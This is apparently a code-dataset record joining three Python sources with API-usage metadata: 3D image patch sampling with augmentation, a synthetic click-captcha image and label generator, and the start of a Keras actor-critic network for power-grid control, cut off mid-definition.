from .deformation import *
def select_image_samples(image, shape=(64,64,64), n=10, seed=None, with_augmentation=False):
"""
    Select n samples from an image (z,x,y) with the given shape. Returns the sampled positions as (z,x,y) coordinates in image space.
Args:
image (numpy.array): an 3D image or array of images
shape (tuple): the sample shape
n (int): the number of samples to be sampled
        seed (int): a random seed for reproducibility of the sampling
Returns:
(np.array) returns an array of sampled positions
"""
positions=[]
    if seed is not None:
np.random.seed(seed)
if with_augmentation:
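        # With augmentation the crop will later be rotated/deformed, so pad by the
        # gap between the longest face diagonal of the sample box and the target
        # shape to keep the final sample fully inside the cropped region.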
sp=np.power(shape,2)
diagonal=np.ceil(np.sqrt(np.max([sp[0]+sp[1],sp[1]+sp[2],sp[2]+sp[0]]))).astype("uint32")
padding=np.ceil(np.max(np.array(diagonal-shape))).astype("uint32")
else:
padding=0
new_shape=np.array(shape)+2*padding
while len(positions) < n:
z = np.random.randint(padding,image.shape[0]-new_shape[0]-1)
x = np.random.randint(padding,image.shape[1]-new_shape[1]-1)
y = np.random.randint(padding,image.shape[2]-new_shape[2]-1)
positions.append([z,x,y])
return positions
def get_image_samples(image, positions, shape=(64,64,64), with_rotation=False, max_rotations=(90,90,90), order=3, with_deformation=False, max_displacement=20, sigma=3, seed=None, cores=1):
"""
Extract samples of the given shape from an image (z,x,y) at the given positions.
Args:
image (numpy.array): an 3D image or array of images
shape (tuple): the sample shape
positions (np.array): the sample positions
Returns:
(np.array) returns an array of sampled sub-images
"""
if order>0:
method="linear"
else:
method="nearest"
    if seed is not None:
np.random.seed(seed)
if with_rotation or with_deformation:
sp=np.power(shape,2)
diagonal=np.ceil(np.sqrt(np.max([sp[0]+sp[1],sp[1]+sp[2],sp[2]+sp[0]]))).astype("uint32")
padding=np.ceil(np.max(np.array(diagonal-shape))).astype("uint32")
else:
padding=0
if with_deformation:
sample_shape=_crop_sample(image, positions[0], padding, shape).shape
deformations=np.array([random_deformation_field(sample_shape, max_displacement, sigma) for i in range(len(positions))])
else:
deformations=np.repeat(None,len(positions))
if with_rotation:
rotations=np.array([sample_rotation(max_rotations) for i in range(len(positions))])
else:
rotations=np.repeat(None,len(positions))
samples=np.array(Parallel(cores)(delayed(_crop_sample)(image,pos,padding,shape) for pos in positions))
samples=np.array(Parallel(cores)(delayed(_create_sample)(sample, shape, padding, rot, deform, order) for sample,rot,deform in zip(samples,rotations,deformations)))
if image.shape[-1] == 1:
return np.expand_dims(samples, axis=-1)
else:
return samples
def _create_sample(sample, shape, padding=0, rotations=None, deformation=None, order=3):
if type(rotations) != type(None):
sample=apply_rotation(sample, rotations, order)
if type(deformation) != type(None):
method = "linear" if order>0 else "nearest"
sample=apply_deformation_field(sample, deformation, method)
return np.squeeze(sample[padding:padding+shape[0],padding:padding+shape[1],padding:padding+shape[2]])
def _crop_sample(image, position, padding, shape):
z,x,y=position
return image[(z-padding):z+shape[0]+padding,(x-padding):x+shape[1]+padding,(y-padding):y+shape[2]+padding]
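# Illustrative usage (not part of the original module; `volume` is an assumed
# (z, x, y) array and the augmentation helpers come from the relative imports above):
#
#     volume = np.random.rand(128, 256, 256)
#     positions = select_image_samples(volume, shape=(64, 64, 64), n=4, seed=0,
#                                      with_augmentation=True)
#     patches = get_image_samples(volume, positions, shape=(64, 64, 64),
#                                 with_rotation=True, seed=0, cores=1)
#     # -> one squeezed (64, 64, 64) patch per position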
|
[
"numpy.random.seed",
"numpy.power",
"numpy.expand_dims",
"numpy.max",
"numpy.random.randint",
"numpy.array",
"joblib.Parallel",
"numpy.squeeze",
"joblib.delayed"
] |
[((3458, 3564), 'numpy.squeeze', 'np.squeeze', (['sample[padding:padding + shape[0], padding:padding + shape[1], padding:\n padding + shape[2]]'], {}), '(sample[padding:padding + shape[0], padding:padding + shape[1],\n padding:padding + shape[2]])\n', (3468, 3564), True, 'import numpy as np\n'), ((699, 719), 'numpy.random.seed', 'np.random.seed', (['seed'], {}), '(seed)\n', (713, 719), True, 'import numpy as np\n'), ((757, 775), 'numpy.power', 'np.power', (['shape', '(2)'], {}), '(shape, 2)\n', (765, 775), True, 'import numpy as np\n'), ((990, 1005), 'numpy.array', 'np.array', (['shape'], {}), '(shape)\n', (998, 1005), True, 'import numpy as np\n'), ((1058, 1119), 'numpy.random.randint', 'np.random.randint', (['padding', '(image.shape[0] - new_shape[0] - 1)'], {}), '(padding, image.shape[0] - new_shape[0] - 1)\n', (1075, 1119), True, 'import numpy as np\n'), ((1127, 1188), 'numpy.random.randint', 'np.random.randint', (['padding', '(image.shape[1] - new_shape[1] - 1)'], {}), '(padding, image.shape[1] - new_shape[1] - 1)\n', (1144, 1188), True, 'import numpy as np\n'), ((1196, 1257), 'numpy.random.randint', 'np.random.randint', (['padding', '(image.shape[2] - new_shape[2] - 1)'], {}), '(padding, image.shape[2] - new_shape[2] - 1)\n', (1213, 1257), True, 'import numpy as np\n'), ((1938, 1958), 'numpy.random.seed', 'np.random.seed', (['seed'], {}), '(seed)\n', (1952, 1958), True, 'import numpy as np\n'), ((2021, 2039), 'numpy.power', 'np.power', (['shape', '(2)'], {}), '(shape, 2)\n', (2029, 2039), True, 'import numpy as np\n'), ((3033, 3065), 'numpy.expand_dims', 'np.expand_dims', (['samples'], {'axis': '(-1)'}), '(samples, axis=-1)\n', (3047, 3065), True, 'import numpy as np\n'), ((2735, 2750), 'joblib.Parallel', 'Parallel', (['cores'], {}), '(cores)\n', (2743, 2750), False, 'from joblib import Parallel, delayed\n'), ((2842, 2857), 'joblib.Parallel', 'Parallel', (['cores'], {}), '(cores)\n', (2850, 2857), False, 'from joblib import Parallel, delayed\n'), ((2751, 2772), 'joblib.delayed', 'delayed', (['_crop_sample'], {}), '(_crop_sample)\n', (2758, 2772), False, 'from joblib import Parallel, delayed\n'), ((2858, 2881), 'joblib.delayed', 'delayed', (['_create_sample'], {}), '(_create_sample)\n', (2865, 2881), False, 'from joblib import Parallel, delayed\n'), ((808, 861), 'numpy.max', 'np.max', (['[sp[0] + sp[1], sp[1] + sp[2], sp[2] + sp[0]]'], {}), '([sp[0] + sp[1], sp[1] + sp[2], sp[2] + sp[0]])\n', (814, 861), True, 'import numpy as np\n'), ((904, 930), 'numpy.array', 'np.array', (['(diagonal - shape)'], {}), '(diagonal - shape)\n', (912, 930), True, 'import numpy as np\n'), ((2072, 2125), 'numpy.max', 'np.max', (['[sp[0] + sp[1], sp[1] + sp[2], sp[2] + sp[0]]'], {}), '([sp[0] + sp[1], sp[1] + sp[2], sp[2] + sp[0]])\n', (2078, 2125), True, 'import numpy as np\n'), ((2168, 2194), 'numpy.array', 'np.array', (['(diagonal - shape)'], {}), '(diagonal - shape)\n', (2176, 2194), True, 'import numpy as np\n')]
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import os
import time
import json
import random
import numpy as np
from jinja2 import Template
from PIL import Image, ImageDraw, ImageFont
class ConfigError(Exception):
pass
class ClickCaptcha(object):
def __init__(self):
        # project root directory
self.basedir = os.getcwd()
# if not os.path.exists(self.basedir):
# os.mkdir(self.basedir)
        # Image settings
        # self.no_steps = self.height # number of gradient steps
        self.width = 320  # width
        self.height = 160  # height
        self.mode = "RGB"  # image mode
        # Text settings
self.enable_add_text = True
        # number of target characters
self.word_count_min = 3
self.word_count_max = 20
        self.word_offset = 5  # minimum distance between characters
        self.width_left_offset = 10  # margin between characters and the image border
self.width_right_offset = 40
self.height_top_offset = 10
self.height_bottom_offset = 40
        # Font placeholders (configured via font_settings)
        self.word_size = 30  # font size
self.font_path = None
self.set_font = None
self.word_list_file_path = None
self.word_list = None
self.location_offset = 0
        # Interference lines
self.enable_interference_line = False
self.inter_line_min = 10
self.inter_line_max = 16
self.interference_line_width = 3
self.interference_line_radius = (-40, 40)
        # Dummy (fake) characters
self.enable_dummy_word = False
        self.dummy_word_width = 2  # stroke width of dummy characters
self.dummy_word_count_min = 3
self.dummy_word_count_max = 5
self.dummy_word_strokes_min = 6
self.dummy_word_strokes_max = 15
self.dummy_word_color = (0, 0, 0)
        # Image save paths
self.enable_save_status = True
self.image_postfix = "jpg"
self.save_img_dir = os.path.join(self.basedir, "JPEGImages")
self.save_label_dir = os.path.join(self.basedir, "Annotations")
        # Label file configuration
self.label_type = "xml"
if self.label_type == "json":
self.json_pretty = True
if self.json_pretty:
self.indent = 4
else:
self.indent = None
elif self.label_type == "xml":
self.template_path = "exp.xml"
        # Internal parameters
self.word_point_list = None
self.img = None
self.draw = None
self.word_count = None
self.gradient = None
self.label_string = None
def font_settings(self, word_size=32, font_path=None, word_list_file_path=None):
        self.word_size = word_size  # font size
        self.font_path = font_path  # font path
        self.word_list_file_path = word_list_file_path  # character-set file (character mapping)
        self.location_offset = int(self.word_size // 6)
        # font and character set
        if self.font_path:
            self.set_font = ImageFont.truetype(self.font_path, self.word_size)  # load the font
        else:
            raise ConfigError("Please specify an absolute or relative font file path, e.g. C:/windows/fonts/simkai.ttf")
        # character-set path
        if self.word_list_file_path:
            self.word_list = list()  # character set: the file must contain a JSON array
            with open(self.word_list_file_path, "r", encoding="utf-8") as f:
                self.word_list = json.load(f)
        else:
            raise ConfigError("Please specify an absolute or relative path to the character dictionary file, e.g. data/chinese_word.json")
def get_random_word(self):
return random.choice(self.word_list)
@staticmethod
def gen_random_color():
"""
        Get a random background color (darker colors are filtered out).
:return:
"""
a = random.randint(0, 255)
b = random.randint(50, 255)
c = random.randint(50, 255)
return a, b, c
@staticmethod
def gen_random_line_color():
"""
        Get a random line color.
:return:
"""
a = random.randint(0, 255)
b = random.randint(0, 255)
c = random.randint(0, 255)
return a, b, c
@staticmethod
def lerp_colour(c1, c2, t):
"""
        Compute the interpolated color for one gradient step.
:param c1:
:param c2:
:param t:
:return:
"""
return int(c1[0] + (c2[0] - c1[0]) * t), int(c1[1] + (c2[1] - c1[1]) * t), int(c1[2] + (c2[2] - c1[2]) * t)
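    # Worked example (illustrative): lerp_colour((0, 0, 0), (255, 0, 0), 0.5)
    # returns (127, 0, 0), the truncated midpoint between black and pure red.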
def init_gradient(self):
"""
        Build the list of gradient colors.
:return:
"""
list_of_colors = [self.gen_random_color(), self.gen_random_color(),
self.gen_random_color(), self.gen_random_color()]
for i in range(len(list_of_colors) - 2):
for j in range(self.height):
self.gradient.append(self.lerp_colour(list_of_colors[i], list_of_colors[i + 1], j / self.height))
def init_gradient_image_draw(self):
"""
        Create an image with a gradient-colored background.
:return:
"""
self.img = Image.new(self.mode, (self.width, self.height), (0, 0, 0))
for i in range(self.height):
for j in range(self.width):
self.img.putpixel((j, i), self.gradient[j])
self.draw = ImageDraw.Draw(self.img)
def generate_random_location(self, i_num):
"""
        Generate a random position that does not overlap any previously placed object.
:param i_num:
:return:
"""
# print("=== <word index: {}> start generate random location (x, y)".format(i_num))
while True:
# print(">>> start judge <<<")
judge = [False] * i_num
normal = [True] * i_num
location_x = random.randint(self.width_left_offset, self.width - self.width_right_offset)
location_y = random.randint(self.height_top_offset, self.height - self.height_bottom_offset)
# print("word_point_list: {}".format(self.word_point_list))
# print("right now (x, y) -> ({}, {})".format(location_x, location_y))
for index, wp in enumerate(self.word_point_list):
x1, y1 = wp
if location_x > x1 + self.word_size + self.word_offset:
judge[index] = True
elif location_x + self.word_size + self.word_offset < x1:
judge[index] = True
elif location_y > y1 + self.word_size + self.word_offset:
judge[index] = True
elif location_y + self.word_size + self.word_offset < y1:
judge[index] = True
else:
# print("(x, y)->({}, {}) interference to word_point_list!".format(location_x, location_y))
continue
if judge == normal:
# print("(x, y) -> ({}, {}) -> pass".format(location_x, location_y))
return location_x, location_y
def add_text_to_images(self):
"""
        Draw the text characters onto the image.
:return:
"""
captcha_info = dict()
captcha_info["word"] = list()
for i in range(0, self.word_count):
            # generate a random position, avoiding overlap with existing objects
            location_x, location_y = self.generate_random_location(i)
            # record the object position
            self.word_point_list.append([location_x, location_y])
            # pick a random character and draw it
word = self.get_random_word()
self.draw.text((location_x, location_y), word, font=self.set_font, fill=(0, 0, 0))
w, h = self.draw.textsize(word, self.set_font)
info = {"x": location_x,
"y": location_y,
"w": w,
"h": h,
"value": word}
captcha_info["word"].append(info)
captcha_info["word_width"] = self.word_size
return captcha_info
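    # The dict returned above has the shape (values illustrative):
    #   {"word": [{"x": 35, "y": 20, "w": 30, "h": 30, "value": "<char>"}, ...],
    #    "word_width": 30}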
def add_interference_line(self):
"""
        Add interference lines.
:return:
"""
num = random.randint(self.inter_line_min, self.inter_line_max)
for i in range(num):
line_x = random.randint(self.width_left_offset, self.width - self.width_right_offset)
line_y = random.randint(self.height_top_offset, self.height - self.height_bottom_offset)
line_x_offset = random.randint(*self.interference_line_radius)
line_y_offset = random.randint(*self.interference_line_radius)
start_point = (line_x, line_y)
end_point = (line_x + line_x_offset, line_y + line_y_offset)
self.draw.line([start_point, end_point], self.gen_random_line_color(), width=self.interference_line_width)
return self.draw
def add_dummy_word(self):
"""
        Add dummy (fake) characters.
:return:
"""
        # number of dummy characters
captcha_info = dict()
captcha_info["dummy"] = list()
num_a = random.randint(self.dummy_word_count_min, self.dummy_word_count_max)
for i in range(num_a):
            # number of strokes for this dummy character
            num_b = random.randint(self.dummy_word_strokes_min, self.dummy_word_strokes_max)
            # generate a random position, avoiding overlaps
            location_x, location_y = self.generate_random_location(i + self.word_count)
            self.word_point_list.append([location_x, location_y])
            # once the position is fixed, generate the stroke endpoints
bx = random.randint(location_x, location_x + self.word_size) # x'
by = random.randint(location_y, location_y + self.word_size) # y'
            line_x_end = location_x + self.word_size  # x + word_size
            line_y_end = location_y + self.word_size  # y + word_size
a = (bx, location_y)
b = (line_x_end, by)
c = (bx, line_y_end)
d = (location_x, by)
for j in range(num_b):
draw_type = random.randint(1, 6)
if draw_type == 1:
self.draw.line([a, b], self.dummy_word_color, width=self.dummy_word_width)
elif draw_type == 2:
self.draw.line([a, c], self.dummy_word_color, width=self.dummy_word_width)
elif draw_type == 3:
self.draw.line([a, d], self.dummy_word_color, width=self.dummy_word_width)
elif draw_type == 4:
self.draw.line([b, c], self.dummy_word_color, width=self.dummy_word_width)
elif draw_type == 5:
self.draw.line([b, d], self.dummy_word_color, width=self.dummy_word_width)
                else:  # draw_type == 6
self.draw.line([c, d], self.dummy_word_color, width=self.dummy_word_width)
info = {"x": location_x,
"y": location_y,
"value": "dummy"}
captcha_info["dummy"].append(info)
return captcha_info
def save_this_image(self, order_num):
"""
        Save the image and its label file.
:param order_num:
:return:
"""
tc = str(time.time()).replace(".", "")
        # image
        img_file = "{}_{}.{}".format(order_num, tc, self.image_postfix)
        img_path = os.path.join(self.save_img_dir, img_file)
        self.img.save(img_path)
        # label
label_file = "{}_{}.{}".format(order_num, tc, self.label_type)
label_path = os.path.join(self.save_label_dir, label_file)
if self.label_type == "json":
with open(label_path, "w", encoding="utf-8") as f:
content = json.dumps(self.label_string, ensure_ascii=False, indent=4)
f.write(content)
elif self.label_type == "xml":
self.render_xml_template(img_file, img_path, label_path)
def render_xml_template(self, img_file, img_path, save_path):
xml_data = dict()
xml_data["words"] = list()
xml_data["dummy_words"] = list()
xml_data["img_path"] = os.path.join(self.basedir, img_path)
xml_data["img_name"] = img_file
xml_data["folder_name"] = self.save_label_dir.split("/")[-1]
xml_data["width"] = self.width
xml_data["height"] = self.height
if self.label_string.get("word", None):
for w in self.label_string["word"]:
item = dict()
item["xmin"] = w["x"]
item["xmax"] = w["x"] + w["w"]
item["ymin"] = w["y"] + self.location_offset
item["ymax"] = w["y"] + w["h"]
item["label"] = w["value"]
xml_data["words"].append(item)
if self.label_string.get("dummy", None):
for w in self.label_string["dummy"]:
item = dict()
item["xmin"] = w["x"] - self.dummy_word_width
item["xmax"] = w["x"] + self.word_size + self.dummy_word_width
item["ymin"] = w["y"] - self.dummy_word_width
item["ymax"] = w["y"] + self.word_size + self.dummy_word_width
xml_data["dummy_words"].append(item)
with open(self.template_path, "r", encoding="utf-8") as f:
before_data = f.read()
t = Template(before_data)
with open(save_path, 'w', encoding="utf-8") as f:
after_data = t.render(xml_data)
f.write(after_data)
def create_image(self, order_num=0):
"""
        Generate a single image according to the configuration.
        :param order_num: sequence number
:return:
"""
if not self.set_font:
            raise ConfigError("Please set the font first (call font_settings)")
print("\n--------------------- Generate picture <{}> -----------------------: ".format(order_num))
        # initialize the drawing objects and the list of object positions
self.gradient = list()
self.init_gradient()
self.init_gradient_image_draw()
self.word_point_list = []
self.word_count = random.randint(self.word_count_min, self.word_count_max)
        # add text
if self.enable_add_text:
captcha_info = self.add_text_to_images()
self.label_string = captcha_info
        # add interference lines
if self.enable_interference_line:
self.add_interference_line()
        # add dummy (fake) characters
if self.enable_dummy_word:
captcha_info = self.add_dummy_word()
self.label_string.update(captcha_info)
def running_time(self, time):
m = time / 60
h = m / 60
if m > 1:
if h > 1:
return str('%.2f' % h) + 'h'
else:
return str('%.2f' % m) + 'm'
else:
return str('%.2f' % time) + 's'
def create_image_by_batch(self, count=5):
"""
        Generate the specified number of images.
:param count:
:return:
"""
strat_time = time.time()
if not self.set_font:
            raise ConfigError("Please set the font first (call font_settings)")
        if self.label_type not in ("xml", "json"):
            raise ConfigError("The label file format must be xml or json")
        self.enable_save_status = True
        # make sure the output directories exist
if not os.path.exists(self.save_img_dir):
os.makedirs(self.save_img_dir)
if not os.path.exists(self.save_label_dir):
os.makedirs(self.save_label_dir)
number = count
time_list = []
for i in range(count):
strats_time = time.time()
number -= 1
self.create_image(i)
            # save the image
if self.enable_save_status:
self.save_this_image(i)
end_time = time.time()
time_data = end_time - strats_time
time_list.append(time_data)
            print(f'Elapsed: {self.running_time(end_time - strat_time)}')
            print(f'Estimated time remaining: {self.running_time((np.mean(time_list)) * number)}')
def show(self):
"""
        Show the generated image.
:return:
"""
if not self.set_font:
            raise ConfigError("Please set the font first (call font_settings)")
self.img.show()
print("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
print("captcha info: {}".format(self.label_string))
print("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
def save(self, path="test.jpg"):
"""
        Save the generated image.
:param path:
:return:
"""
if not self.set_font:
            raise ConfigError("Please set the font first (call font_settings)")
self.img.save(path)
print("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
print("captcha info: {}".format(self.label_string))
print("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
if __name__ == '__main__':
    # create the captcha generator
    c = ClickCaptcha()
    c.font_settings(word_size=32, font_path="msyh.ttf", word_list_file_path="chinese_word.json")
    c.width = 416  # width
    c.height = 416  # height
    # feature switches
    c.enable_add_text = True  # add text
    # template path
    c.template_path = "exp.xml"
    c.enable_interference_line = True  # add interference lines
    c.enable_dummy_word = False  # add dummy character objects
c.create_image_by_batch(20)
|
[
"jinja2.Template",
"PIL.Image.new",
"json.load",
"random.randint",
"os.makedirs",
"os.getcwd",
"os.path.exists",
"random.choice",
"json.dumps",
"time.time",
"PIL.ImageFont.truetype",
"numpy.mean",
"PIL.ImageDraw.Draw",
"os.path.join"
] |
[((313, 324), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (322, 324), False, 'import os\n'), ((1758, 1798), 'os.path.join', 'os.path.join', (['self.basedir', '"""JPEGImages"""'], {}), "(self.basedir, 'JPEGImages')\n", (1770, 1798), False, 'import os\n'), ((1829, 1870), 'os.path.join', 'os.path.join', (['self.basedir', '"""Annotations"""'], {}), "(self.basedir, 'Annotations')\n", (1841, 1870), False, 'import os\n'), ((3288, 3317), 'random.choice', 'random.choice', (['self.word_list'], {}), '(self.word_list)\n', (3301, 3317), False, 'import random\n'), ((3447, 3469), 'random.randint', 'random.randint', (['(0)', '(255)'], {}), '(0, 255)\n', (3461, 3469), False, 'import random\n'), ((3482, 3505), 'random.randint', 'random.randint', (['(50)', '(255)'], {}), '(50, 255)\n', (3496, 3505), False, 'import random\n'), ((3518, 3541), 'random.randint', 'random.randint', (['(50)', '(255)'], {}), '(50, 255)\n', (3532, 3541), False, 'import random\n'), ((3688, 3710), 'random.randint', 'random.randint', (['(0)', '(255)'], {}), '(0, 255)\n', (3702, 3710), False, 'import random\n'), ((3723, 3745), 'random.randint', 'random.randint', (['(0)', '(255)'], {}), '(0, 255)\n', (3737, 3745), False, 'import random\n'), ((3758, 3780), 'random.randint', 'random.randint', (['(0)', '(255)'], {}), '(0, 255)\n', (3772, 3780), False, 'import random\n'), ((4653, 4711), 'PIL.Image.new', 'Image.new', (['self.mode', '(self.width, self.height)', '(0, 0, 0)'], {}), '(self.mode, (self.width, self.height), (0, 0, 0))\n', (4662, 4711), False, 'from PIL import Image, ImageDraw, ImageFont\n'), ((4870, 4894), 'PIL.ImageDraw.Draw', 'ImageDraw.Draw', (['self.img'], {}), '(self.img)\n', (4884, 4894), False, 'from PIL import Image, ImageDraw, ImageFont\n'), ((7511, 7567), 'random.randint', 'random.randint', (['self.inter_line_min', 'self.inter_line_max'], {}), '(self.inter_line_min, self.inter_line_max)\n', (7525, 7567), False, 'import random\n'), ((8395, 8463), 'random.randint', 'random.randint', (['self.dummy_word_count_min', 'self.dummy_word_count_max'], {}), '(self.dummy_word_count_min, self.dummy_word_count_max)\n', (8409, 8463), False, 'import random\n'), ((10577, 10618), 'os.path.join', 'os.path.join', (['self.save_img_dir', 'img_file'], {}), '(self.save_img_dir, img_file)\n', (10589, 10618), False, 'import os\n'), ((10757, 10802), 'os.path.join', 'os.path.join', (['self.save_label_dir', 'label_file'], {}), '(self.save_label_dir, label_file)\n', (10769, 10802), False, 'import os\n'), ((11331, 11367), 'os.path.join', 'os.path.join', (['self.basedir', 'img_path'], {}), '(self.basedir, img_path)\n', (11343, 11367), False, 'import os\n'), ((13200, 13256), 'random.randint', 'random.randint', (['self.word_count_min', 'self.word_count_max'], {}), '(self.word_count_min, self.word_count_max)\n', (13214, 13256), False, 'import random\n'), ((14090, 14101), 'time.time', 'time.time', ([], {}), '()\n', (14099, 14101), False, 'import time\n'), ((2751, 2801), 'PIL.ImageFont.truetype', 'ImageFont.truetype', (['self.font_path', 'self.word_size'], {}), '(self.font_path, self.word_size)\n', (2769, 2801), False, 'from PIL import Image, ImageDraw, ImageFont\n'), ((5289, 5365), 'random.randint', 'random.randint', (['self.width_left_offset', '(self.width - self.width_right_offset)'], {}), '(self.width_left_offset, self.width - self.width_right_offset)\n', (5303, 5365), False, 'import random\n'), ((5391, 5470), 'random.randint', 'random.randint', (['self.height_top_offset', '(self.height - self.height_bottom_offset)'], {}), '(self.height_top_offset, 
self.height - self.height_bottom_offset)\n', (5405, 5470), False, 'import random\n'), ((7618, 7694), 'random.randint', 'random.randint', (['self.width_left_offset', '(self.width - self.width_right_offset)'], {}), '(self.width_left_offset, self.width - self.width_right_offset)\n', (7632, 7694), False, 'import random\n'), ((7716, 7795), 'random.randint', 'random.randint', (['self.height_top_offset', '(self.height - self.height_bottom_offset)'], {}), '(self.height_top_offset, self.height - self.height_bottom_offset)\n', (7730, 7795), False, 'import random\n'), ((7824, 7870), 'random.randint', 'random.randint', (['*self.interference_line_radius'], {}), '(*self.interference_line_radius)\n', (7838, 7870), False, 'import random\n'), ((7899, 7945), 'random.randint', 'random.randint', (['*self.interference_line_radius'], {}), '(*self.interference_line_radius)\n', (7913, 7945), False, 'import random\n'), ((8537, 8609), 'random.randint', 'random.randint', (['self.dummy_word_strokes_min', 'self.dummy_word_strokes_max'], {}), '(self.dummy_word_strokes_min, self.dummy_word_strokes_max)\n', (8551, 8609), False, 'import random\n'), ((8837, 8892), 'random.randint', 'random.randint', (['location_x', '(location_x + self.word_size)'], {}), '(location_x, location_x + self.word_size)\n', (8851, 8892), False, 'import random\n'), ((8916, 8971), 'random.randint', 'random.randint', (['location_y', '(location_y + self.word_size)'], {}), '(location_y, location_y + self.word_size)\n', (8930, 8971), False, 'import random\n'), ((12550, 12571), 'jinja2.Template', 'Template', (['before_data'], {}), '(before_data)\n', (12558, 12571), False, 'from jinja2 import Template\n'), ((14378, 14411), 'os.path.exists', 'os.path.exists', (['self.save_img_dir'], {}), '(self.save_img_dir)\n', (14392, 14411), False, 'import os\n'), ((14425, 14455), 'os.makedirs', 'os.makedirs', (['self.save_img_dir'], {}), '(self.save_img_dir)\n', (14436, 14455), False, 'import os\n'), ((14471, 14506), 'os.path.exists', 'os.path.exists', (['self.save_label_dir'], {}), '(self.save_label_dir)\n', (14485, 14506), False, 'import os\n'), ((14520, 14552), 'os.makedirs', 'os.makedirs', (['self.save_label_dir'], {}), '(self.save_label_dir)\n', (14531, 14552), False, 'import os\n'), ((14656, 14667), 'time.time', 'time.time', ([], {}), '()\n', (14665, 14667), False, 'import time\n'), ((14847, 14858), 'time.time', 'time.time', ([], {}), '()\n', (14856, 14858), False, 'import time\n'), ((3134, 3146), 'json.load', 'json.load', (['f'], {}), '(f)\n', (3143, 3146), False, 'import json\n'), ((9299, 9319), 'random.randint', 'random.randint', (['(1)', '(6)'], {}), '(1, 6)\n', (9313, 9319), False, 'import random\n'), ((10930, 10989), 'json.dumps', 'json.dumps', (['self.label_string'], {'ensure_ascii': '(False)', 'indent': '(4)'}), '(self.label_string, ensure_ascii=False, indent=4)\n', (10940, 10989), False, 'import json\n'), ((10443, 10454), 'time.time', 'time.time', ([], {}), '()\n', (10452, 10454), False, 'import time\n'), ((15070, 15088), 'numpy.mean', 'np.mean', (['time_list'], {}), '(time_list)\n', (15077, 15088), True, 'import numpy as np\n')]
|
import os
import numpy as np
import tensorflow as tf
import tensorflow.keras as tfk
import tensorflow.keras.backend as K
import tensorflow.keras.models as tfkm
import tensorflow.keras.optimizers as tfko
import tensorflow.keras.layers as tfkl
import tensorflow.keras.activations as tfka
import tensorflow.keras.initializers as tfki
from WolperGrid_Config import WolperGrid_Config as cfg
uniform_initializerA = tfki.VarianceScaling(
distribution='uniform',
mode='fan_out',
scale=0.333)
uniform_initializerB = tfki.GlorotNormal()
uniform_initializerC = tfki.HeNormal()
kernel_init = uniform_initializerC
class WolperGrid_NN(object):
def __init__(self,
gridobj,
observation_size,
proto_size,
is_training = False):
self.input_size = observation_size
self.topo_size = gridobj.dim_topo
self.n_line = gridobj.n_line
self.disp_size = gridobj.n_gen
self.is_training = is_training
self.proto_size = proto_size
self.obs_nn = False
        if self.obs_nn:
self.obs_size = 2048
else:
self.obs_size = self.input_size
# AC models
self.obs = None
self.actor = None
self.critic = None
self.construct_wg_obs()
self.construct_wg_actor()
self.construct_wg_critic()
def construct_resmlp(self,
layer_in,
hidden_size,
num_blocks,
name="resmlp"):
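        # Each residual block below is Dense -> tanh -> Dense; the block input is added
        # back to the output and the sum is passed through LayerNormalization.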
layer_name = "{}-resmlp-fc0".format(name)
layer_w = tfkl.Dense(hidden_size,
kernel_initializer=kernel_init,
name=layer_name)(layer_in)
for block in range(num_blocks):
layer_name = "{}-resmlp-fc{}-0".format(name, block)
layer1 = tfkl.Dense(hidden_size,
kernel_initializer=kernel_init,
name=layer_name)(layer_w)
layer1 = tf.nn.tanh(layer1)
layer_name = "{}-resmlp-fc{}-1".format(name, block)
layer2 = tfkl.Dense(hidden_size,
kernel_initializer=kernel_init,
name=layer_name)(layer1)
ln_name = "{}-ln-{}".format(name, block)
ln = tfkl.LayerNormalization(trainable=self.is_training,
name=ln_name)
layer_ln = ln(layer2 + layer_w)
layer_w = layer_ln
return layer_w
def construct_mlp(self,
layer_in,
layer_sizes,
name="mlp",
layer_norm=True,
activation=tf.nn.elu,
activation_final=None):
if layer_norm:
pre_name = "{}-ln-fc".format(name)
layer = tfkl.Dense(layer_sizes[0],
kernel_initializer=kernel_init,
name=pre_name)(layer_in)
ln_name = "{}-ln".format(name)
ln = tfkl.LayerNormalization(trainable=self.is_training,
name=ln_name)
layer = ln(layer, training=self.is_training)
th_name = "{}-tanh".format(name)
layer = tf.nn.tanh(layer, name=th_name)
size_index = 1
else:
size_index = 0
layer = layer_in
for i, size in enumerate(layer_sizes[size_index:-1]):
layer_name = "{}-fc-{}".format(name, i + 1)
layer = tfkl.Dense(size,
kernel_initializer=kernel_init,
name=layer_name)(layer)
# Add activation if provided
if activation is not None:
activation_name = "{}-act-{}".format(name, i + 1)
layer = activation(layer, name=activation_name)
# Final layer
layer_name = "{}-fc-{}".format(name, "final")
layer_final = tfkl.Dense(layer_sizes[-1],
kernel_initializer=kernel_init,
name=layer_name)(layer)
if activation_final is not None:
activation_name = "{}-act-{}".format(name, "final")
layer_final = activation_final(layer_final, name=activation_name)
# Return final
return layer_final
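    # Illustrative call (not from the original code): construct_mlp(x, [128, 64, 8])
    # with layer_norm=True builds Dense(128) -> LayerNorm -> tanh, then Dense(64) + elu,
    # and a final Dense(8) whose activation is activation_final (None by default).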
def construct_wg_obs(self):
input_shape = (self.input_size,)
input_obs = tfk.Input(dtype=tf.float32,
shape=input_shape,
name='input_obs')
## MLP variant
if self.obs_nn:
layer_n = 8
layer_idxs = np.arange(layer_n)
layer_range = [0, layer_n - 1]
size_range = [
self.input_size,
self.obs_size
]
sizes_np = np.interp(layer_idxs, layer_range, size_range)
            sizes = list(sizes_np.astype(int))
output_obs = self.construct_mlp(input_obs,
sizes,
name="obs",
layer_norm=True,
activation=tf.nn.elu,
activation_final=tf.nn.elu)
else: ## Disabled variant
output_obs = tfka.linear(input_obs)
obs_inputs = [input_obs]
obs_outputs = [output_obs]
self.obs = tfk.Model(inputs=obs_inputs,
outputs=obs_outputs,
name="obs_" + self.__class__.__name__)
self.obs_opt = tfko.Adam(lr=cfg.LR_CRITIC)
self.obs.compile(loss="mse", optimizer=self.obs_opt)
def construct_wg_actor(self):
# Defines input tensors and scalars
input_shape = (self.obs_size,)
input_obs = tfk.Input(dtype=tf.float32,
shape=input_shape,
name='actor_obs')
# Forward encode
## MLP variant
layer_n = 8
layer_idxs = np.arange(layer_n)
layer_range = [0, layer_n - 2, layer_n - 1]
size_range = [
self.obs_size,
128,
